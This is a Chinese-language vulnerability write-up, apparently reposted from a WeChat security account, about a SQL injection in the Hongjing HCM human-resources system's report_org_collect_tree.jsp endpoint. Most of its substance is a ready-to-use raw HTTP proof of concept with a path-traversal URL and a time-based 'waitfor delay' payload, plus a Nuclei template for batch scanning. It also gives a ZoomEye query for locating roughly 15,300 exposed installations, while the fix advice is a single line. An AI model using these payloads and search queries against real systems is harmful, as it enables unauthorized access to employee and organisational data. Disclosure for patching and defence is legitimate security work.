宏景HCM-report/接口存在SQL注入漏洞|漏洞挖掘

admin
admin
admin
138635
文章
114
评论
2024年4月22日06:50:15评论49 views字数 1922阅读6分24秒阅读模式

0x01 产品简介

        宏景人力资源管理系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。这里我推荐利用 ZoomEye搜索引擎直接输入关键字即可,影响资产15300+。

宏景HCM-report/接口存在SQL注入漏洞|漏洞挖掘

声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

 

0x02 漏洞描述

SQL注入是一种安全攻击手段,主要是利用Web应用程序对用户输入的数据没有进行足够的安全处理(如危险字符过滤或者语句过滤),而直接拼接SQL语句执行时产生的。

0x03 ZoomEye语法

app:"宏景 HCM"

宏景HCM-report/接口存在SQL注入漏洞|漏洞挖掘

0x04 漏洞复现

POC

POST /templates/attestation/../../report/report_collect/report_org_collect_tree.jsp HTTP/1.1Host: {}Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: JSESSIONID=C79DED09D8CE46170DEB697EA6999135Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 60params=&isAction=2&cycle_id=2;waitfor%20delay%20'0:0:5'--%20

宏景HCM-report/接口存在SQL注入漏洞|漏洞挖掘

Nuclei批量检测POC(请自行搭建环境检测)
id: hongjinge-HR-report_org_collect_tree-sqliinfo:  name: hongjinge-HR-report_org_collect_tree-sqli  author: HackTwo  severity: high  description: otherhttp:  - raw:      - |        POST /templates/attestation/../../report/report_collect/report_org_collect_tree.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Content-Type: application/x-www-form-urlencoded        Connection: close        params=&isAction=2&cycle_id=2;waitfor%20delay%20'0:0:5'--%20    matchers:      - type: dsl        dsl:          - "status_code==200 && duration>=5"

宏景HCM-report/接口存在SQL注入漏洞|漏洞挖掘

0x05 修复建议

官方已经推出新版本,建议升级到最新版

 

原文始发于微信公众号(渗透安全HackTwo):宏景HCM-report/接口存在SQL注入漏洞|漏洞挖掘

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日06:50:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   宏景HCM-report/接口存在SQL注入漏洞|漏洞挖掘https://cn-sec.com/archives/2587978.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息